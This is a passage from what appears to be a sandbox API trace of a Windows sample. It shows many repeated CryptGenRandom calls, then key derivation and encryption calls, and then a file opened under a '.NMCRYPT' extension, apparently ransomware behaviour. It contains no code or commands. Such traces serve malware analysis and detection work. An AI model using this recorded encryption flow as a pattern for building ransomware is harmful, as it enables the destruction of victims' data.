pbBuffer=0x2d7e630) returned 1 [0166.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.342] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.343] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.344] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.345] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.346] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.346] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0166.346] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0166.346] CryptCreateHash (in: hProv=0x8e3198, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444824 | out: phHash=0x1d444824) returned 1 [0166.346] CryptHashData (hHash=0x9ad2b8, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0166.346] CryptDeriveKey (in: hProv=0x8e3198, Algid=0x6610, hBaseData=0x9ad2b8, dwFlags=0x4, phKey=0x1d444828 | out: phKey=0x1d444828*=0x9ad5b8) returned 1 [0166.346] CryptSetKeyParam (hKey=0x9ad5b8, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0166.346] CryptSetKeyParam (hKey=0x9ad5b8, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0166.346] wcslen (_String="\\\\?\\") returned 0x4 [0166.346] CryptDuplicateKey (in: hKey=0x9ad5b8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad2f8) returned 1 [0166.346] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Tiki.gif.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\tiki.gif.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c4 [0166.347] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Tiki.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\tiki.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 